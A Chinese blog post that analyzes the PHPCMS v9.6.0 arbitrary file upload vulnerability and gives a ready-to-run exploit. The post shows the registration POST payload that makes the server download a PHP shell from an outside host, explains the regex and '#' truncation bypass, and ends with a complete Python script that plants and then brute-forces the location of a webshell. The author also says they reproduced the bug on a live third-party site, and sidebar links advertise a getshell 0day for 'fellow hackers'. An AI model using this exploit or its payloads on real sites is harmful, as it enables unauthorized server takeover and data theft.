PHPcms V9 任意文件上传漏洞

最新推荐文章于 2024-05-15 05:08:03 发布
最新推荐文章于 2024-05-15 05:08:03 发布
阅读量5.7k 收藏 5
点赞数 2
分类专栏: 文件上传 php 漏洞分析
By Azjj 转发请注明
本文链接:https://blog.csdn.net/weixin_44578334/article/details/108403692
版权
漏洞分析 同时被 3 个专栏收录
28 篇文章 3 订阅
订阅专栏
文件上传
11 篇文章 5 订阅
订阅专栏
php
3 篇文章 0 订阅
订阅专栏

之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站复现一下此漏洞

一丶漏洞简介

此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。

二丶影响版本

phpcms v9.6.0

三丶漏洞分析

漏洞利用点是注册的地方,我们来看一下网上常用的一个payload:

http://127.0.0.1/index.php?m=member&c=index&a=register&siteid=
POST:
siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://127.0.0.2/bx/php.txt?.php#.jpg>&dosubmit=1&protocol=

其实最主要的问题就出现在Download函数上


/**
 * 附件下载
 * Enter description here ...
 * @param $field 预留字段
 * @param $value 传入下载内容
 * @param $watermark 是否加入水印
 * @param $ext 下载扩展名
 * @param $absurl 绝对路径
 * @param $basehref 
 */
function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '', $basehref = '')
{
    global $image_d;
    $this->att_db = pc_base::load_model('attachment_model');
    $upload_url = pc_base::load_config('system','upload_url');
    $this->field = $field;
    $dir = date('Y/md/');
    $uploadpath = $upload_url.$dir;
    $uploaddir = $this->upload_root.$dir;
    $string = new_stripslashes($value);
    if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i", $string, $matches)) return $value;
    $remotefileurls = array();
    foreach($matches[3] as $matche)
    {
        if(strpos($matche, '://') === false) continue;
        dir_create($uploaddir);
        $remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref);
    }
    unset($matches, $string);
    $remotefileurls = array_unique($remotefileurls);
    $oldpath = $newpath = array();
    foreach($remotefileurls as $k=>$file) {
        if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue;
        $filename = fileext($file);
        $file_name = basename($file);
        $filename = $this->getname($filename);
 
        $newfile = $uploaddir.$filename;
        $upload_func = $this->upload_func;
        if($upload_func($file, $newfile)) {
            $oldpath[] = $k;
            $GLOBALS['downloadfiles'][] = $newpath[] = $uploadpath.$filename;
            @chmod($newfile, 0777);
            $fileext = fileext($filename);
            if($watermark){
                watermark($newfile, $newfile,$this->siteid);
            }
            $filepath = $dir.$filename;
            $downloadedfile = array('filename'=>$filename, 'filepath'=>$filepath, 'filesize'=>filesize($newfile), 'fileext'=>$fileext);
            $aid = $this->add($downloadedfile);
            $this->downloadedfiles[$aid] = $filepath;
        }
    }
    return str_replace($oldpath, $newpath, $value);
}

这里匹配了srchref中文件的文件名,不过后缀为$ext,其中$ext的值为:gif|jpg|jpeg|bmp|png,由于匹配的不严格,导致可以绕过

 

if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i", $string, $matches)) return $value;

随后在这一行带入了函数fillurl

$remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref);

fillurl中去掉了#后的内容:

 

$pos = strpos($surl,'#');
        if($pos>0) $surl = substr($surl,0,$pos);

最后就构造出下载php的链接

四丶漏洞复现

打开注册页面

填入信息 ,抓取数据包

将POST包修改为以下内容

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://127.0.0.1/php.txt?.php#.jpg>&dosubmit=1&protocol=

原理就是匹配了src或href中文件的文件名,不过后缀为$ext,其中$ext的值为:gif|jpg|jpeg|bmp|png,这个是可以绕过,http://127.0.0.1/php.txt?.php#.jpg,然后fillurl函数中给我们去掉了#后的内容:

$pos = strpos($surl,'#');

        if($pos>0) $surl = substr($surl,0,$pos);

导致下载我们服务器上的txt到服务器上生成webshell

 

五丶漏洞修复

在phpcms9.6.1中修复了该漏洞,修复方案就是对用fileext获取到的文件后缀再用黑白名单分别过滤一次

exp:

import re
import requests
import random
import time

def randomstring(length):
    s = ''
    dic = "abcdefghijklmnopqrstuvwxyz"
    for i in range(int(length)):
        s += dic[random.randint(0,25)]
    return s

def poc(url):
    u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
    data = {
        'siteid': '1',
        'modelid': '11',
        "username": "%s"%randomstring(12),
        "password": "%s"%randomstring(12),
        "email": "%s@qq.com"%randomstring(12),
        'info[content]': '<img src=http://xxx/shell.txt?.php#.jpg>',
        'dosubmit': '1',
    }
    headers = {
        'cookie:':'PHPSESSID=t3id73sqv3dbnkhbbd0ojeh5r0; XDEBUG_SESSION=PHPSTORM'
    }
    rep = requests.post(u, data=data)
    #print rep.content

    shell = ''
    re_result = re.findall(r'&lt;img src=(.*)&gt', rep.content)
    if len(re_result):
        shell = re_result[0]
        if shell:
            print 'shell:',shell

    tmp = time.strftime('%Y%m%d%I%M%S',time.localtime(time.time()))
    path = time.strftime('%Y',time.localtime(time.time()))+'/'+time.strftime('%m%d',time.localtime(time.time()))+'/'
    for i in range(100,999):
        filename = tmp+str(i)+'.php'
        shell = url+'uploadfile/'+path+filename
        req = requests.get(url=shell)
        if req.status_code == 200:
            print 'brute shell:',shell
            break


if __name__ == '__main__':
    poc('http://localhost/')

 

Azjj98
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
利用phpcms v9 0day拿shell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
Phpcms V9.6.0任意文件写入getshell
主题模板站的博客
01-21 585
PHPcms v9.6的任意文件上传漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传phpcms v9.6正常部署phpcms v9.6就好。复现过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
最全PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(3),2024年最新闭关60天学懂NDK+物联网嵌入式
最新发布
2401_85015332的博客
05-15 337
漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。
phpcms v9文件上传漏洞复现
qq_50646296的博客
08-21 1837
我们通过软件burp suite 抓包,修改一个变量,不停的发包,我们可以手动或者让软件不停的访问我们呢上传的PHP,如果显示出PHP内容,时间竞争成功。方法:我们发现它只是删除了压缩包里面的文件,但这段代码并不会对解压后的文件夹递归删除,只能对解压的文件直接删除。分析:当程序不递归删除时,我们直接将图片和.php文件压缩上传,会发现图片还在,.php文件被删除了。此时,我们再将其上传,可以看到,我们的PHP文件就被保留下来了。我们创建一个文件夹,放入以下文件,然后将这个文件经行压缩。
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1456
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4581
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
phpcms_v9 后台上传图片按钮无法点击
06-21
PHP CMS v9在设计时可能依赖于Flash来处理文件上传,导致在当前环境下,当尝试上传图片时,按钮无响应。 要解决这个问题,我们需要将原有的基于Flash的图片上传插件替换为HTML5的图片上传插件。HTML5提供了File API...
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
本文来分析一下PHPCMS V9专题模块注入漏洞
PHPCMS V9 修改flash上传为H5上传方案 phpcms上传文件statics下js
03-01
PHPCMS V9 是其中的一款知名系统,它提供了丰富的功能和模块化设计,方便开发者进行定制和扩展。然而,随着技术的发展,传统的Flash上传...这一改动将使PHPCMS V9文件上传功能更加现代化,适应移动互联网时代的需求。
PHPCMS V9 修改flash上传为H5上传方案
11-27
1. **修改上传控制器**:找到PHPCMS V9 的上传控制器文件,一般位于`content/controllers/upload.php`。在这里,需要将原有的Flash上传代码替换为HTML5的上传逻辑。HTML5上传通常会使用FormData对象来封装文件数据,...
漏洞复现】用友-U9-PatchFile-任意文件上传
知黑而守白
01-12 310
用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友U9多组织企业互联网应用平台 PatchFile 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
phpcmsV9官方源码漏洞
haocaicai的博客
09-27 1258
(1)、phpcms的/phpcms/libs/classes/attachment.class.php中,对输入参数$ext未进行类型限制,导致逻辑漏洞的产生。 解决方法:修改/phpcms/libs/classes/attachment.class.php文件143行左右的download方法,在方法开始位置加入: function download($field, $value,$...
phpcms漏洞_phpcms v9.6.0前台任意文件上传漏洞分析
weixin_39809793的博客
11-21 766
前言上一节我们分析了phpcms的后台get shell, 但是众所周知, 开发者对后台的漏洞 是不太上心的。因为管理员账号一般只有网站所有者才会有,如果入侵者能获取到管理员 账号,那么基本上意味着网站的所有信息都为他打开了大门,后台漏洞也就不那么重要了。 那么今天要分析的是phpccms 9.6.0版本的前台get shell. 漏洞的利用方式极其简单。 但是相对而言,代码的漏洞实现逻辑就没有前...
phpcms 漏洞姿势
热门推荐
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
用友u8c-CacheInvokeServlet-反序列化rce漏洞-day漏洞复现(未公开)
weixin_43167326的博客
01-20 636
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修复了一个存在于用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
PHPcmsV9任意文件读取漏洞拿Shell
fengling132的专栏
08-02 1499
编辑:madman 日期:2012-07-29 分类:技术文章, 最新漏洞 评论:9条评论 简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解
phpcms v9上传图片改为h5
07-27
PHPCMS v9 是一种流行的网站内容管理系统,用于创建和维护网站。它有一个功能强大的图片上传功能,但目前是基于Flash的。然而,随着技术的发展和浏览器对Flash支持度的下降,越来越多的开发者将图片上传功能改为HTML5。 将PHPCMS v9的图片上传改为HTML5有许多好处。首先,HTML5支持跨平台和跨浏览器,几乎所有现代浏览器都支持HTML5。相比之下,Flash对某些平台和设备的支持可能有限。其次,HTML5无需用户安装任何插件或软件,使得用户使用更加便捷。最后,使用HTML5可以提供更好的用户体验,例如拖放上传、实时预览和进度条等。 要将PHPCMS v9的图片上传改为HTML5,首先需要更新后端代码,以便支持新的上传方式。PHP是PHPCMS的后端语言,可以使用PHP的文件上传函数来处理HTML5的文件上传。其次,需要更新前端代码,以便替换掉原来的Flash上传组件。在HTML5中,可以使用input标签的type属性设置为file来创建一个文件上传表单控件,并使用JavaScript监听文件选择或拖放事件,实现实时预览和进度条功能。 除了修改代码,还需要更改PHPCMS的配置文件,以便将上传存储路径更改为服务器上合适的文件夹。同时,需要相应地更改数据库中存储图片信息的表结构,以适应新的图片上传方式。 总结而言,将PHPCMS v9的图片上传改为HTML5是一个重要的升级步骤,可以提供更好的用户体验和更广泛的平台兼容性。需要改动后端和前端代码,并相应地更新配置文件和数据库表结构。这样做可以使得网站更加现代化和可访问,适应不断变化的技术环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Azjj98

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值